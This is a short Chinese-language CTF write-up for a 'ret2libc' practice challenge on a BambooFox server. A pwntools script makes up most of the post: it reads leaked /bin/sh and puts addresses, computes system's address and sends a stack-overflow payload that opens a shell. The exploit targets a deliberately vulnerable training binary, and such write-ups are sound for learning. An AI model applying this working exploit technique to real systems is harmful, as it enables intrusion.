ret2libc

Description

nc bamboofox.cs.nctu.edu.tw 11002

ret2libc practice

 

32位动态链接ELF,开了NX

程序有栈溢出,并且甚至直接给出了/bin/sh和puts的地址,因此直接做就行了

exp如下:

from pwn import *

context.arch = 'i386'
context.os = 'linux'

#io = process('./ret2libc')
io = remote('bamboofox.cs.nctu.edu.tw', 11002)
elf = ELF('./ret2libc')
#libc = elf.libc
libc = ELF('./libc.so.6')

io.recvuntil('The address of "/bin/sh" is ')
binsh_addr = int(io.recvline().strip(), 16)
info('binsh_addr: ' + hex(binsh_addr))
io.recvuntil('The address of function "puts" is ')
puts_addr = int(io.recvline().strip(), 16)
info('puts_addr: ' + hex(puts_addr))
libc_base = puts_addr - libc.symbols['puts']
info('libc_base: ' + hex(libc_base))
system_addr = libc_base + libc.symbols['system']
info('system_addr: ' + hex(system_addr))

payload = b'a' * 32 + p32(system_addr) + p32(0) + p32(binsh_addr)
io.sendline(payload)

io.interactive()

 

posted @ 2021-09-02 15:14  hktk1643  阅读(132)  评论(0编辑  收藏  举报